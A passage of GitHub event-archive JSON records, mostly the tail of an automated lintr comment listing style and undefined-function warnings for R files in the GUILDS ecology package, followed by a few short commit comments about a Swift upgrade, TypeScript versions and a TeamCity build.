^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k - 1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k - 1)\n               ^\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:38:10:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L38) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L39) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  sad <- prestonsort(aux)\n         ^~~~~~~~~~~\n```\n[R/expected.R:43:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L43) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:49:8:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L49) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:49:19:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:50:21:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L50) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:50:39:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L50) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:51:50:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:53:21:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:53:39:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:54:50:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:60:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L60) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gx <- prestonsort(meanx)\n        ^~~~~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L61) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gy <- prestonsort(meany)\n        ^~~~~~~~~~~\n```\n[R/expected.R:62:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L67) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L67) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:73:18:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  meanx <- rep(0,Jx)\n                 ^\n```\n[R/expected.R:74:18:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  meany <- rep(0,Jy)\n                 ^\n```\n[R/expected.R:77:8:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L77) *warning:* **no visible global function definition for ‘draw_local_cond’**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n       ^~~~~~~~~~~~~~~\n```\n[R/expected.R:77:19:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n                 ~^~~\n```\n[R/expected.R:78:21:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:78:39:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:79:50:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L81) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:81:39:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:82:34:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:82:50:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:88:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L88) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gx <- prestonsort(meanx)\n        ^~~~~~~~~~~\n```\n[R/expected.R:89:9:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L89) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gy <- prestonsort(meany)\n        ^~~~~~~~~~~\n```\n[R/expected.R:90:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/expected.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/generateData.R:6:5:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0) {\n    ^\n```\n[R/generateData.R:10:5:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L10) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y < 0) {\n    ^\n```\n[R/generateData.R:14:5:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L14) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x > 1) {\n    ^\n```\n[R/generateData.R:18:5:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y > 1) {\n    ^\n```\n[R/generateData.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:23:5:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/generateData.R:28:3:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L28) *warning:* **local variable ‘SADX’ assigned but may not be used**\n```r\n​  SADX <- c()\n  ^~~~\n```\n[R/generateData.R:29:3:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L29) *warning:* **local variable ‘SADY’ assigned but may not be used**\n```r\n​  SADY <- c()\n  ^~~~\n```\n[R/generateData.R:36:27:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:36:66:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:37:27:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:40:3:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/generateData.R:41:5:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/generateData.R:42:18:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                 ^\n```\n[R/generateData.R:42:28:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/generateData.R:42:33:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/generateData.R:43:26:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L43) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (lgamma(allN + 1) + \n                         ^~~~\n```\n[R/generateData.R:43:37:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​                 (lgamma(allN + 1) + \n                                    ^\n```\n[R/generateData.R:44:30:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/generateData.R:44:42:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/generateData.R:45:19:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L45) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  allN * log(nx) + \n                  ^~~~\n```\n[R/generateData.R:45:35:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  allN * log(nx) + \n                                  ^\n```\n[R/generateData.R:46:20:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​                 (J-allN) * log(ny))\n                  ~^~\n```\n[R/generateData.R:46:21:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (J-allN) * log(ny))\n                    ^~~~\n```\n[R/generateData.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L49) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n             ^~~~~~~~~~~~~~~~\n```\n[R/generateData.R:49:44:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L49) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                           ^~~~\n```\n[R/generateData.R:49:49:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                                ^\n```\n[R/generateData.R:55:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L55) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sadx <- generate.ZSM(theta, I_X, NX)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L56) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sady <- generate.ZSM(theta, I_Y, NY)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:58:17:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L58) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  output <- list( guildX = sadx, guildY = sady)\n                ^\n```\n[R/generateData.R:59:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:64:38:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                     ^\n```\n[R/generateData.R:64:46:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                             ^\n```\n[R/generateData.R:64:48:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                               ^\n```\n[R/generateData.R:66:39:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  b <- lgamma(theta_x + theta_y + J) - \n                                      ^\n```\n[R/generateData.R:68:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:71:32:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                              ~^~\n```\n[R/generateData.R:71:34:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                                ~^~\n```\n[R/generateData.R:72:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:76:1:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​localComm <- function(alpha_x, alpha_y, Jx, Jy, px) {\n^~~~~~~~~\n```\n[R/generateData.R:82:27:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:82:66:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:83:27:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:85:4:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L85) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(is.infinite(I_X) && is.infinite(I_Y)) {\n   ^\n```\n[R/generateData.R:86:29:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​     output <- exp( lgamma(J+1) - \n                           ~^~\n```\n[R/generateData.R:86:34:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​     output <- exp( lgamma(J+1) - \n                                 ^\n```\n[R/generateData.R:87:36:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L87) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(Jx + 1) + \n                                   ^\n```\n[R/generateData.R:89:35:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    Jx * log(nx) + \n                                  ^\n```\n[R/generateData.R:90:23:](https://github.com/thijsjanzen/GUILDS/blob/7a57eda7a38e330437d8e2191242b475a13f67f4/R/generateData.R#L90) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-Jx) * log(ny))\n                     ~^~\n```\n"}},"created_at":"2016-09-22T20:38:50Z"}
{"id":"4604952260","type":"CommitCommentEvent","actor":{"login":"joligario"},"repo":{"name":"joligario/CookieCrunch"},"payload":{"comment":{"id":19136599,"position":null,"line":null,"path":null,"commit_id":"48936c9fbe526e25b546fe0f51d8362172efbd46","created_at":"2016-09-22T20:39:29Z","updated_at":"2016-09-22T20:39:29Z","body":"Not initial commit, rather upgrade to Swift 2.3 and ios10 target."}},"created_at":"2016-09-22T20:39:29Z"}
{"id":"4604953485","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":19136602,"position":null,"line":null,"path":null,"commit_id":"c33842f8f027d0ccd0259e807a3a6c64bc4b81f0","created_at":"2016-09-22T20:39:43Z","updated_at":"2016-09-22T20:39:43Z","body":"what version of typescript? You need to have typescript 2 if you want to use the 2.0.x release. Otherwise, stick with 1.3.27"}},"created_at":"2016-09-22T20:39:43Z"}
{"id":"4604954966","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19136605,"position":null,"line":null,"path":null,"commit_id":"db05cecbb722cd0903db10a70a39a154034ae893","created_at":"2016-09-22T20:40:00Z","updated_at":"2016-09-22T20:40:00Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 259](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1221&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-22T20:40:00Z"}
{"id":"4604958285","type":"CommitCommentEvent","actor":{"login":"lurqui21"},"repo":{"name":"Social-Projects/calibration-devices-system"},"payload":{"comment":{"id":19136615,"position":43,"line":40,"path":"web/src/main/java/com/softserve/edu/controller/client/application/ClientApplicationController.java","commit_id":"ed2cd0fe388c019c6e2f20e3833b6601064443ce","created_at":"2016-09-22T20:40:37Z","updated_at":"2016-09-22T20:40:37Z","body":"WTF ^ 2!!!"}},"created_at":"2016-09-22T20:40:37Z"}
